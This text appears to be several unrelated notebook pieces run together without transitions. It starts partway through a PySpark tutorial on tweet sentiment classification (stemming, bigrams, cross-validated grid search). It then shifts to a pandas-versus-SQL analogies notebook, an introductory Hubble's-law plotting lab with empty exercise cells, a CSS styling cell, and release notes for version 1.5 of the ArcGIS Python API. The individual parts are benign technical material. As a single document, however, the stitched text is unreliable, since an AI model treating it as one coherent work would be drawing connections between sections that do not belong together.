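d = Demo(inputCol="tokens", outputCol="stemmed")
# d._input_kwargs == {'inputCol': 'tokens', 'outputCol': 'stemmed'}
```

Calling `Demo("tokens")` with a positional argument would raise a `TypeError`, which is exactly the "forces keyword arguments" behavior described above.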
### Stemming with the NLTK's PorterStemmer
Let's apply stemming to our problem without removing stop words to see if it improves the performance of our model.
```
stem2 = PorterStemming(inputCol="tokens", outputCol="stemmed")
```
We'll do things a little differently this time for the sake of runtime performance. Stemming is an expensive operation because it requires the use of a custom transformer. Any time we introduce custom functions like UDFs or special Python functions outside of the SparkSQL functions we pay a runtime <a href="https://medium.com/teads-engineering/spark-performance-tuning-from-the-trenches-7cbde521cf60">penalty</a>. Therefore we want to use custom functions as sparingly as possible.
Since we will use stemming in multiple different models, we create new training and testing datasets that are already pre-stemmed. This avoids having to repeatedly tokenize and stem our datasets each time we train and test one of our models. We define a pipeline for creating the new dataset below,
```
stem_pipeline = Pipeline(stages= [tk, stem2]).fit(train)
```
Then we transform the training and testing set and cache them so they are in memory and can be used without having to recreate them,
```
train_stem = stem_pipeline.transform(train)\
.where(F.size(F.col("stemmed")) >= 1)
test_stem = stem_pipeline.transform(test)\
.where(F.size(F.col("stemmed")) >= 1)
# cache them to avoid running stemming
# each iteration in the grid search
train_stem.cache()
test_stem.cache()
```
Let's see some of the results of stemming the tweets:
```
test_stem.show(5)
```
We can see that the words 'baby' and 'beautiful' are reduced to 'babi' and 'beauti' respectively.
Let's now build our second pipeline (using TF-IDF and logistic regression) based off the pre-stemmed training dataset and test it on the pre-stemmed testing set.
```
# create the new pipeline
# create term frequencies from the pre-stemmed tokens
tf3 = HashingTF(inputCol="stemmed", outputCol="rawFeatures", numFeatures=1e5)
idf = IDF(inputCol="rawFeatures", outputCol="features", minDocFreq=2.0)
lr = LogisticRegression(maxIter=20)
stemming_pipeline2 = Pipeline(stages= [tf3, idf, lr])
# fit and get predictions
model4 = stemming_pipeline2.fit(train_stem)
predictions4 = model4.transform(test_stem)
score4 = evaluator.evaluate(predictions4)
```
The AUC of the new model on the test set is,
```
print("AUC SCORE: {}".format(score4))
```
We can see that adding stemming degrades the AUC slightly compared to the baseline model, but *we'll keep using stemming in our future models since the jury's still out on whether it will improve them*. One thing I will mention here is that I did try using stop word removal and stemming together, but this resulted in worse performance than just stop word removal alone.
As I mentioned previously, stemming using a custom Transformer is expensive. One way I could see that it is an expensive operation is by going to <a href="https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/YARN.html">YARN</a> (on our cluster this is the address: http://mikescluster-m:8088) shown below:
*(screenshot: the YARN Resource Manager web UI)*
Then clicking on ApplicationMaster in the bottom right hand corner. This leads you to the <a href="https://jaceklaskowski.gitbooks.io/mastering-apache-spark/spark-webui.html">Spark Web UI </a>page:
*(screenshot: the Spark Web UI)*
Clicking on stages we can see the time and memory it takes for each stage in our pipelines (or more generally jobs). I used the Spark Web UI constantly to track the progress of my jobs and noticed that stemming caused the TF-IDF stages to take much longer than they did without it.
## N-Grams And Parameter Tuning With Cross Validation <a class="anchor" id="bullet6"></a>
--------------------
The last preprocessing technique we'll try to improve the predictive power of our model is to use N-grams. This technique is used to capture combinations of words that affect the sentiment of the document. For instance the sentence,
the food is not bad
is naturally assumed to have a positive, or at least non-negative, sentiment. After tokenizing the sentence we would have the list,
["the", "food", "is", "not", "bad"]
Using the normal bag-of-words with TF-IDF, our model would see the word 'bad' and most likely assume that the sentence has negative sentiment. This is because the presence of the token 'bad' is usually associated with a negative sentiment. What our model fails to ascertain is that the presence of the word 'not' before 'bad' leads to the combination 'not bad', which normally coincides with a positive sentiment. In order to pick up these types of combinations of words we introduce n-grams. Bigrams combine consecutive pairs of words in our bag-of-words model. Using bigrams the previous example sentence would be,
[["the", "food"], ["food", "is"], ["is", "not"], ["not", "bad"]]
Using bigrams our model will see the combination `["not", "bad"]` and be able to ascertain that the sentiment of the sentence is positive. Bigrams use consecutive pairs of words to form tokens for our model; N-grams generalize this process to combine N consecutive words into tokens for our bag-of-words model.
Another thing I should point out is that **while using bigrams introduces consecutive pairs of words in documents as tokens in the bag-of-words model, the order of those bigrams in the document is not taken into consideration. Each tweet is reduced to a set of bigrams and the bag-of-words model treats those bigrams similar to categorical features/one-hot encoding.** The difference between bag-of-words and one-hot encoding is that instead of the value in each column for a token being 0 or 1 based on its presence in the tweet, the value is 0-N with N being how many times the token appears in the tweet.
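Conceptually, forming bigrams is just sliding a window of length two over the token list; a minimal sketch (Spark's `NGram` similarly outputs space-joined strings):

```python
def ngrams(tokens, n=2):
    # slide a window of length n over the token list
    return [" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]

bigrams = ngrams(["the", "food", "is", "not", "bad"])
# -> ['the food', 'food is', 'is not', 'not bad']
```

Setting `n=3` would produce trigrams, and so on for higher-order N-grams.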
### Basic model with bigrams
We import the NGram class from the features module and use bigrams (`n=2`) for our model,
```
from pyspark.ml.feature import NGram
bigram = NGram(inputCol="tokens", outputCol="bigrams", n=2)
```
Then we form a pipeline by first tokenizing the words in the sentence, forming bigrams, performing TF-IDF and then fitting the logistic regression model. One thing to note is that introducing bigrams means that our bag-of-words model has features that are based on pairs of words instead of individual words. Since the number of combinations of pairs of words is "larger" than the number of individual words, we increase the number of features in our model to `200,000` from `100,000`.
We define the new pipeline, train, test and evaluate the model:
```
tf5 = HashingTF(inputCol="bigrams", outputCol="rawFeatures", numFeatures=2e5)
bigram_pipeline = Pipeline(stages= [tk, bigram, tf5, idf, lr])
model5 = bigram_pipeline.fit(train)
predictions5 = model5.transform(test)
score5 = evaluator.evaluate(predictions5)
print("AUC SCORE: {}".format(score5))
```
We can see that using bigrams provides an improvement to the basic model!
### Stemming with bigrams
While using stemming alone did not lead to an improvement over our baseline model, using stemming with bigrams might. My reason for believing this is that while bigrams improve the performance of our model, they also increase the dimension of our problem. By introducing stemming we reduce the number of variations of the word pairs (the variance in our data) and also reduce the dimension of our feature space.
We create our new pipeline on the pre-stemmed training and testing datasets as well as evaluate the model:
```
bigram2 = NGram(inputCol="stemmed", outputCol="bigrams", n=2)
tf6 = HashingTF(inputCol="bigrams", outputCol="rawFeatures", numFeatures=2e5)
idf = IDF(inputCol="rawFeatures", outputCol="features", minDocFreq=2.0)
lr = LogisticRegression(maxIter=20)
stem_bigram_pipeline = Pipeline(stages= [bigram2, tf6, idf, lr])
model6 = stem_bigram_pipeline.fit(train_stem)
predictions6 = model6.transform(test_stem)
score6 = evaluator.evaluate(predictions6)
print("AUC SCORE: {}".format(score6))
```
We can see that using bigrams and stemming leads to not only an improvement over the baseline model, but also the bigram model! My intuition was right! :)
Let's take a look at examples of what each stage in the above pipeline did to the tweet:
```
predictions6.select(["tweet_clean","tokens","stemmed","bigrams"]).show(5)
```
### Parameter Tuning Using A Grid Search
Now let's try to improve the performance of the stemming-bigram model by tuning the hyperparameters of some of the stages in the pipeline. Tuning the hyperparameters of our model involves a grid search which evaluates all the hyperparameter combinations we want to consider and returns the model with the best results. In order to get the best out-of-sample performance from our model we perform <a href="https://en.wikipedia.org/wiki/Cross-validation_(statistics)">cross-validation</a> for each parameter combination in the grid search. Using cross validation within the grid search reduces the chances of overfitting our model and will hopefully give us the best performance on the test set.
In order to perform a grid search with cross validation we import the classes,
```
from pyspark.ml.tuning import CrossValidator, ParamGridBuilder
```
Then define the model pipeline,
```
bigram2 = NGram(inputCol="stemmed", outputCol="bigrams", n=2)
tf6 = HashingTF(inputCol="bigrams", outputCol="rawFeatures", numFeatures=2e5)
idf = IDF(inputCol="rawFeatures", outputCol="features")
lr = LogisticRegression(maxIter=20)
stem_bigram_pipeline = Pipeline(stages= [bigram2, tf6, idf, lr])
```
Next we declare the 'hyperparameter grid' we want to search over using the `ParamGridBuilder` class,
```
paramGrid = ParamGridBuilder() \
.addGrid(idf.minDocFreq, [2, 5]) \
.addGrid(lr.regParam, [0.0, 0.1]) \
.build()
```
This is a small grid because the training time on our tiny 2-node Hadoop cluster is somewhat long. Again, the point of this blog post is not to get the best performance possible, but rather to show how the pieces of the SparkML library fit together. I will remark that these hyperparameter choices are just exploring what level of regularization we want to apply in the feature generation stage (`idf.minDocFreq`) and the model fitting stage (`lr.regParam`) of our ML Pipeline.
Now let's define the grid search with cross validation using the `CrossValidator` class,
```
crossval = CrossValidator(estimator = stem_bigram_pipeline,
estimatorParamMaps = paramGrid,
evaluator = BinaryClassificationEvaluator(),
numFolds = 3)
```
Notice that we need
- the Spark ML Pipeline
- the parameter grid values
- the metric used to evaluate the performance of the models
- the number of folds ($k$) for cross validation
While values of `k=5` or `k=10` are most often used in cross validation, we have a large sample size in our training set and training on the cluster takes a long time, so I chose a smaller value of 3. We could also have used the <code>TrainValidationSplit</code> class, which evaluates each parameter choice only once instead of once per each of the $k$ folds in <code>CrossValidator</code>. This estimator is not as expensive as cross validation, but can produce less reliable results when the dataset isn't large enough. See the <a href="https://spark.apache.org/docs/latest/ml-tuning.html#train-validation-split">documentation</a> for more information.
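To see why the runtime matters here, a back-of-the-envelope count of the pipeline fits this search performs (assuming each parameter combination is fit once per fold, plus one final refit of the best parameter set on the full training data):

```python
# hyperparameter grid from the ParamGridBuilder above
min_doc_freqs = [2, 5]
reg_params = [0.0, 0.1]
num_folds = 3

combinations = len(min_doc_freqs) * len(reg_params)  # 4 parameter combinations
total_fits = combinations * num_folds + 1            # 12 CV fits + 1 final refit
```

Thirteen full pipeline fits is why even this small grid takes a while on a 2-node cluster, and why doubling either the grid or $k$ gets expensive quickly.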
Now we can perform the grid search!
```
model = crossval.fit(train_stem)
```
Then make predictions on testing set to get the model performance,
```
predictions = model.transform(test_stem)
score = evaluator.evaluate(predictions)
print("AUC SCORE: {}".format(score))
```
Notice that while this result is better than the baseline model, it is not as good as the stemmed-bigram model we first came up with. We could ostensibly try more parameter values and larger $k$ values to get a better score, but the performance of this model is good enough.
Next let's get the accuracy of the model on the testing set. We do this by first getting the best model from the grid search,
```
bestModel = model.bestModel
```
Then we can get the accuracy just as we did with the baseline model,
```
predictedAndLabels = predictions.select(["prediction","label"])\
.rdd.map(lambda r : (float(r[0]), float(r[1])))
metrics = MulticlassMetrics(predictedAndLabels)
print("Test Set Accuracy: {}".format(metrics.accuracy))
```
81.5% accuracy with an AUC of 0.891 is pretty good for Twitter sentiment analysis!
Let's now find out which parameters from the grid search resulted in the best model. We can see the various stages in the model pipeline by using the `.stages` attribute:
```
bestModel.stages
```
Then within each stage we can get the hyperparameter value by passing the name to the `explainParam` method:
```
bestModel.stages[2].explainParam('minDocFreq')
bestModel.stages[-1].explainParam('regParam')
```
We can see that the best model came from a result of having `minDocFreq=5` and `regParam=0.1` in the IDF and Logistic Regression stage of our pipeline respectively.
The last thing we'll do is get an idea of the ROC curve for our best model. I could only do this for the training set, by getting the logistic regression stage's summary:
```
summary = bestModel.stages[-1].summary
```
Then getting the True Positive Rate and False Positive Rate below and plotting them against one another:
```
import matplotlib.pyplot as plt
plt.figure(figsize=(6,6))
plt.plot([0, 1], [0, 1], 'r--')
plt.plot(summary.roc.select('FPR').collect(),
summary.roc.select('TPR').collect())
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title("ROC Curve")
plt.show()
```
## Conclusions <a class="anchor" id="bullet7"></a>
----------------------
In this two part blog post we went over how to perform Extract-Transform-Load (ETL) for NLP using Spark and MongoDB and then how to build a machine learning model for sentiment analysis using SparkML on the Google Cloud Platform (GCP). In this post we focused on creating a machine learning model using <a href="https://spark.apache.org/docs/latest/ml-pipeline.html">ML Pipelines</a>, starting out with a basic model using TF-IDF and logistic regression. We added different stages to our ML Pipeline such as removing stop words, stemming and using bigrams to see which procedure would improve the predictive performance of our model. In the process we also went over how to write our own custom transformer in PySpark. Once we settled on using stemming and bigrams in our model we performed a grid search using cross validation to obtain a model that has an AUC of 0.891 for the ROC curve and 81.5% accuracy, which is not too shabby! One thing I didn't go over that is valuable is how to persist the ML Pipeline model to use again later without having to retrain; for that see <a href="https://spark.apache.org/docs/latest/ml-pipeline.html#ml-persistence-saving-and-loading-pipelines">here</a>.
## Some useful analogies to SQL operations
The data set is a list of two columns, viz. userid and app name. See venn_sample_gen.py to generate this set.
A sample is given below.
| userid | app |
|---------|------------|
| u000001 | ola |
| u000002 | freecharge |
| u000002 | mobikwik |
| u000002 | fastcab |
| u000003 | uber |
| u000003 | ola |
| u000003 | freecharge |
| u000004 | ola |
| u000004 | mobikwik |
| u000004 | uber |
| u000004 | fastcab |
| u000004 | freecharge |
```
import numpy as np
import pandas as pd
from pandas import DataFrame
# from odo import odo
# df = odo('venn_sample_gen.csv', pd.DataFrame)
df = pd.DataFrame(
[
('u000001','ola'),
('u000002','freecharge'),
('u000002','mobikwik'),
('u000002','fastcab'),
('u000003','uber'),
('u000003','ola'),
('u000003','freecharge'),
('u000004','ola'),
('u000004','mobikwik'),
('u000004','uber'),
('u000004','fastcab'),
('u000004','freecharge')
], columns=['userid','app']
)
df
```
#### how many users?
```sql
select count(distinct userid) from userapps
```
```
len(df.groupby('userid').groups)
```
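An equivalent, arguably more idiomatic, one-liner uses `Series.nunique`, which counts distinct values directly:

```python
import pandas as pd

# same sample data as above
df = pd.DataFrame(
    [('u000001', 'ola'), ('u000002', 'freecharge'), ('u000002', 'mobikwik'),
     ('u000002', 'fastcab'), ('u000003', 'uber'), ('u000003', 'ola'),
     ('u000003', 'freecharge'), ('u000004', 'ola'), ('u000004', 'mobikwik'),
     ('u000004', 'uber'), ('u000004', 'fastcab'), ('u000004', 'freecharge')],
    columns=['userid', 'app'])

n_users = df['userid'].nunique()  # -> 4
```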
#### users with more than X apps?
```sql
select userid, count(1) from userapps group by userid having count(1) > X order by 2 desc;
```
Let us assume X=2
```
MIN_APPS = 2
# all these below can be in one chained line; breaking it up for better readability
gf = DataFrame({'count':df.groupby('userid')['app'].count()})
gf = gf.reset_index().set_index('userid', drop=True)
gf = gf.query("count > %d" % MIN_APPS).sort_values('count', ascending=False)
gf
```
### get top 3 apps used
```sql
select * from (select app,count(userid) as users from userapps group by app order by 2 desc) x
limit 3
```
```
df.groupby('app')['userid'].count().sort_values(ascending=False)[:3]
```
### how many users have both uber and ola apps?
```sql
select o.userid from userapps o where o.app='uber' and exists
(select 1 from userapps i where i.userid=o.userid and i.app='ola')
```
I know this is better done using a join than exists; but for illustration, this is easier.
```
ola_and_uber = pd.merge(df.query("app == 'uber'"), df.query("app == 'ola'"), on='userid')
ola_and_uber
# now add a field that shows the other apps these particular set has
pd.merge(ola_and_uber, df.query("app not in ('ola','uber')"), on='userid')
```
### how many users use ola, but not uber?
```sql
select o.userid from userapps o where o.app='ola' and not exists
(select 1 from userapps i where i.userid=o.userid and i.app='uber')
```
```
bothusers = df.loc[df['app'].isin(['uber','ola'])]
uberusers = df.loc[df['app'] == 'uber']
bothusers.set_index("userid").index.difference(uberusers.set_index("userid").index)
```
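The same "ola but not uber" question can also be answered with plain Python set difference, which mirrors the SQL `NOT EXISTS` most directly:

```python
# same sample data as above, as (userid, app) tuples
rows = [('u000001', 'ola'), ('u000002', 'freecharge'), ('u000002', 'mobikwik'),
        ('u000002', 'fastcab'), ('u000003', 'uber'), ('u000003', 'ola'),
        ('u000003', 'freecharge'), ('u000004', 'ola'), ('u000004', 'mobikwik'),
        ('u000004', 'uber'), ('u000004', 'fastcab'), ('u000004', 'freecharge')]

ola_users = {u for u, app in rows if app == 'ola'}
uber_users = {u for u, app in rows if app == 'uber'}
ola_not_uber = ola_users - uber_users  # -> {'u000001'}
```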
### how do we transform data into a pivot for NoSQL fans?
```
userapps = DataFrame({'apps':df.groupby('userid')['app'].apply(tuple)})
userapps
```
### *** Names: [Insert Your Names Here]***
# Lab 4 - Plotting and Fitting with Hubble's Law
```
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
```
<div class=hw>
## Exercise 1
In the cell below, I have transcribed the data from Edwin Hubble's original 1929 paper "A relation between distance and radial velocity among extra-galactic nebulae", available [here](https://www.pnas.org/content/pnas/15/3/168.full.pdf).
a. Open the original paper. Use it and your knowledge of Python code to decipher what each line in the next two code cells is doing. Add a comment at the top of each line stating what it is doing and/or where in the paper it came from.
b. Create a scatter plot from Hubble's data. To make a scatter plot in Python, use the same plt.plot function that we used for line graphs last week, except that after the x and y arguments you add a string describing the plotting symbol you want. [Here](https://matplotlib.org/3.1.1/api/markers_api.html) is a list of plot symbols. Note that you can combine these with colors, so, for example, 'go' is green circles and 'rx' is red xs. Give your plot a title and axis labels to match Hubble's original.
c. Write code that will print each entry in the list obj_list on its own line (you will need this for exercise 2, below).
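For instance, the symbol-string syntax looks like this (throwaway data, not part of the lab solution):

```python
import matplotlib.pyplot as plt

# throwaway data -- not the Hubble values
x = [1, 2, 3]
y = [2, 4, 6]

# 'go' = green circles; 'rx' would give red x markers
line, = plt.plot(x, y, 'go')
plt.title('Marker string demo')
plt.xlabel('x')
plt.ylabel('y')
```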
```
NGC_nos = [6822,598,221,224,5457,4736,5194,4449,4214,
3031,3627,4826,5236,1068,5055,7331,4258,
4151,4382,4472,4486,4649]
obj_list = ['SMC', 'LMC']
for i in np.arange(len(NGC_nos)):
obj_list.append('NGC '+str(NGC_nos[i]))
dists = np.array([0.032,0.034,0.214,0.263,0.275,0.275,0.45,0.5,0.5,0.63,0.8,0.9,0.9,
0.9,0.9,1.0,1.1,1.1,1.4,1.7,2.0,2.0,2.0,2.0])#Mpc
vels = np.array([170.,290,-130,-70,-185,-220,200,290,270,200,300,-30,650,150,500,920,450,500,500,960,500,850,800,1000]) #km/sec
#plot goes here
#loop to print names goes here
```
<div class=hw>
## Exercise 2
Now, let's pull modern data for Hubble's galaxies. Copy and paste the list from Exercise 1c into the query form [here](http://ned.ipac.caltech.edu/forms/gmd.html). ***Before you click "Submit Query"***, scroll to the check boxes at the bottom of the page and make sure to check ***only*** the following:
* User Input Object Name
* Redshift
* Redshift Uncertainty
And in the bottom right panel:
* Metric Distance
* Mean
* Standard Deviation
* Number of measurements
Open the Macintosh application "TextEdit" and copy and paste the table into it. From the Format menu, select "Make Plain Text" and then save it as cat.txt in the same folder as your Lab 4 notebook.
The code cells below will "read in" the data using a python package called Pandas that we will learn about in great detail in the coming weeks. For now, just execute the cell below, which will create python lists stored in variables with descriptive names from your cat.txt file.
a) Describe in words at least two patterns that you notice in the tabular data.
b) Make a histogram for each of the following quantities: redshift, redshift_uncert, dist, and dist_uncert. All your plots should have axis labels, and for the histograms you should play around with the number of bins until you can justify your choice for this value. Discuss and compare the shapes of the distributions for each of the quantities in general, qualitative terms.
c) Plot the uncertainty in redshift as a function of redshift for these galaxies, and the uncertainty in distance as a function of distance. What patterns do you notice, if any, in the relationships between these quantities and their uncertainties?
```
import pandas
cols = ['Obj Name', 'Redshift', 'Redshift Uncert', 'Dist Mean (Mpc)', 'Dist Std Dev (Mpc)', 'Num Obs']
df = pandas.read_csv('cat.txt', delimiter ='|', skiprows=3, header = 0, names = cols, skipinitialspace=True)
redshift = df["Redshift"].tolist()
redshift_uncert = df["Redshift Uncert"].tolist()
dists2 = df["Dist Mean (Mpc)"].tolist()
dists2_uncert = df["Dist Std Dev (Mpc)"].tolist()
#display table (python "data frame" object)
df
```
***Answer to Part a***
```
#plots for part b - redshift
#plots for part b - redshift uncertainty
#plots for part b - distance
#plots for part b - distance uncertainty
```
***Part B explanation***
```
#part c scatter plot 1
#part c scatter plot 2
```
***Part C explanation***
<div class=hw>
## Exercise 3
The conversion between redshift (z) as provided in the database and recessional velocity as provided in Hubble's original paper is given by the formula below.
$$1+z=\sqrt{\frac{1+\beta}{1-\beta}}$$
where $\beta$=v/c. This formula can also be written as:
$$\beta=\frac{(z+1)^2-1}{(z+1)^2+1}$$
a) Write a function with an appropriate docstring that applies this formula to an input array. Your function should return an array of velocities in km/sec.
b) Apply your new function to your redshift and redshift uncertainty arrays here to translate them to "recessional velocities", as in Hubble's original plot.
\* Note that technically we should do some more complicated error propagation here, and we will discuss this later in this class. Luckily though, this formula is roughly equivalent to z = v/c, which means that errors in z and v can be directly translated.
```
#part a here
#part b here
```
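For reference, the second form of the conversion formula maps onto code along these lines. This is an illustrative sketch, not the required lab solution; the speed-of-light constant in km/s is my own addition.

```python
import numpy as np

C_KM_S = 2.998e5  # speed of light in km/s (assumed value)

def redshift_to_velocity(z):
    """Convert redshift(s) z to recessional velocity in km/s
    using beta = ((z + 1)**2 - 1) / ((z + 1)**2 + 1)."""
    z = np.asarray(z, dtype=float)
    zp1_sq = (z + 1.0) ** 2
    beta = (zp1_sq - 1.0) / (zp1_sq + 1.0)
    return beta * C_KM_S

# for small z this reduces to the familiar v ≈ z * c
print(redshift_to_velocity([0.0, 0.001]))
```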
<div class=hw>
## Exercise 4
Make the following plots, with appropriate axis labels and titles.
a) A plot of the new data similar to the one you made in exercise 1, only with error bars. Use the function plt.errorbar and inflate the errors in the modern recessional velocities by a factor of 10, because they are actually so small for these very nearby galaxies with today's measurement techniques that we can't even see them unless we inflate them.
b) A plot showing both the new and old data overplotted, with different colors for each and a legend.
c) A plot showing Hubble's distances vs. the new distances, with a "1 to 1" line overplotted
d) A plot showing Hubble's recessional velocities vs. the new velocities, with a "1 to 1" line overplotted
e) Discuss at least two trends that you see in the graphs and make a data-driven argument for how they might explain the discrepancy between the modern values and Hubble's. As always, your explanations need not be lengthy, but they should be ***clear and specific***.
```
#Plot a here
#Plot b here
#Plot c here
# Plot d here
```
***Part e explanations here***
***We will do the exercise below in class next week and you should not attempt it now. However, it builds directly on this lab, so take some time with your lab mates to think about how you will approach it, since you will only have one 50min class period in which to answer it.***
## In-Class Exercise for Next Week
Time for fitting! Use the lecture notes on Model fitting as a guide to help you.
a) Fit a linear model to Hubble's data and to the modern data. Make a plot showing both datasets and both fit lines. The plot should include a legend with both the points and the lines. The lines should be labeled in the legend with their equations.
b) Now, let's fit a linear model to the modern data that takes the error bars in the recessional velocities into account in the fit. The problem here though is that the uncertainties in redshifts/recessional velocities are VERY small for these galaxies. So small in fact that when you overplot error bars on the data points you can't even see them (you can do this to verify). So to demonstrate differences between weighted and unweighted fits here, let's inflate them by a factor of 50. Overplot both the unweighted and weighted lines together with the modern data (with y error bars) and an appropriate legend.
c) Discuss at least one trend or effect that you see in each graph. As always, your explanations need not be lengthy, but they should be ***clear, supported with references to the plot, and specific***.
d) We won't do fitting with x and y error bars, but you can easily make a plot that shows errors in both quantities using plt.errorbar. Do this using the TRUE errors in velocity and distance (not the inflated values), and use your plot to make an argument about whether the "Hubble's Law" line is a good fit to the data.
```
#import relevant modules here
#define a linear model function here
#calculate the values for your two fits here and print their values (to label lines)
#plot 1 goes here
#weighted fit goes here
#plot with error bars goes here
```
***Discuss trends or effects seen here***
```
#plot with x AND y errors goes here
from IPython.core.display import HTML
def css_styling():
styles = open("../../custom.css", "r").read()
return HTML(styles)
css_styling()
```
# What's new in version 1.5
#### New
* Updated the **[`Map Widget`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.widgets.html#mapview)** to use the **[ArcGIS API for JavaScript 4x](https://developers.arcgis.com/javascript/)** release
* Broader support for authoring and rendering `WebScenes`
* Full support for [`JupyterLab`](http://jupyterlab.readthedocs.io/en/stable/getting_started/overview.html). See **[JupyterLab Guide](../using-the-jupyter-lab-environment)**.
* Support for specifying `autocast` JavaScript renderers from Python code
* Support for exporting `Map Widgets` to standalone HTML pages
* Support for using an external ArcGIS API for JavaScript CDN for disconnected environments
* Miscellaneous bug fixes
* Added the new **`Spatially Enabled Dataframe`** to eventually replace the [`SpatialDataFrame`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe) class
* New implementation: **Accessor-based** `spatial` namespace accessible as the `sdf` property on a Pandas dataframe
* Improvements to rendering, projections and support for Arcade expressions
* Added `usage` property on [`Item`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#item) class to inspect individual statistics
* Added attribute checks for geometries in environments where `ArcPy` is not available
* Added `summary` property to [`arcgis.admin.ux`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html#ux) to add description of Portal or ArcGIS Online Organization instance
* Added support for using server raster functions in raster analytics jobs using [`apply()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html#apply)
* Enhancements to support for [`mosaic_rules`](https://developers.arcgis.com/documentation/common-data-types/mosaic-rules.htm) on `ImageryLayers`, including when using [`save()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#imagerylayer) and [`identity()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html#arcgis.raster.functions.identity)
* Added [`AssignmentIntegrationManager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.workforce.managers.html#arcgis.apps.workforce.managers.AssignmentIntergrationManager) class to [`Workforce`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.workforce.html) module as the `integrations` property on a [`Project`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.workforce.html#project)
* Added url builder functions to the [`apps`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.html) module
* Enhanced numerous [`Global Raster functions`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#module-arcgis.raster.functions.gbl) with parameter validation checks, including [`cost_distance()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#cost-distance), [`cost_allocation()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#cost-allocation), [`flow_distance()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#flow-distance), [`zonal_statistics()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html#zonal-statistics) and others
* Added `cost_backlink()`, `euclidean_direction()`, `cost_path()`, `kernel_density()`, and `calculate_travel_cost()` to Global Raster Functions and `optimum_travel_cost_network()` to Raster Analytics
* Added `category_filters` parameter to improve [`search()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.search) capabilities
* Added `find_centroids` function to [`arcgis.features.find_locations`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.find_locations.html) submodule
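The accessor-based `spatial`/`sdf` namespace mentioned above builds on pandas' own extension-accessor mechanism. A minimal sketch of how such a namespace gets registered, using generic pandas only (this is not the actual arcgis implementation, and `demo`/`ncols` are invented names for illustration):

```python
import pandas as pd


@pd.api.extensions.register_dataframe_accessor("demo")
class DemoAccessor:
    """Toy accessor exposing df.demo.ncols, analogous in spirit
    to how a 'spatial' namespace can be attached to DataFrames."""

    def __init__(self, pandas_obj):
        self._obj = pandas_obj

    @property
    def ncols(self):
        # number of columns in the wrapped DataFrame
        return len(self._obj.columns)


df = pd.DataFrame({'a': [1], 'b': [2]})
print(df.demo.ncols)  # → 2
```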
#### Fixes
* Fixed BUG-000114520 where assigning categories with a Python script removed previously assigned categories
* Fixed issue when returning sharing properties on an `Item` if item is in a folder
* Fixed issue when passing colors in as a list on the `Spatially Enabled Dataframe`
* Fixed issue where [`arcgis.network.analysis.solve_vehicle_routing_problem`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.network.analysis.html#solve-vehicle-routing-problem) failed because of missing parameters
* Fixed mismatched parameters on the [`SyncManager.synchronize()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.SyncManager.synchronize) method
* Fixed issue where `spatial_join()` failed if `ArcPy` was not available in the environment
* Fixed issue when exporting to a feature class failed if `ArcPy` was not available in the environment
* Fixed issue where creating a `FeatureSet` from a `Pandas dataframe` failed
* Fixed issue on the `Spatially Enabled Dataframe` `plot()` method using the unique values renderer
* Fixed issue for ensuring valid values passed to the `rendering_rules` parameter of the [`ImageryLayer`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#imagerylayer) `identify()` and `compute_stats_and_histograms()` functions
* Added `item_rendering_rule` parameter to [`ImageryLayer.mosaic_by()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#arcgis.raster.ImageryLayer.mosaic_by) function
* Corrected invalid internal key in [`ImageryLayer.mosaic_rule()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#arcgis.raster.ImageryLayer.mosaic_rule)
* Updated parameters in the [`GeoAnalytics`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.toc.html#module-arcgis.geoanalytics) [`summarize_data.summarize_within()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html#summarize-within), [`find_locations.detect_incidents()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.find_locations.html#detect-incidents), and [`analyze_patterns.find_hot_spots()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.analyze_patterns.html#find-hot-spots) functions
* Fixed [`GeoAnalytics.find_locations.geocode_locations()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.find_locations.html#geocode-locations) function
* Increased flexibility of the [`output_datastore`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.env.html#output-datastore) environment variable
* Fixed issue where dates older than the Unix Epoch caused failures
* Fixed issue where [`Item.protect()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.protect) failed to repopulate the Item object
* Fixed bug in [`gis.admin.SSLCertificates.get()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html#arcgis.gis.admin.SSLCertificates.get) method and improved documentation
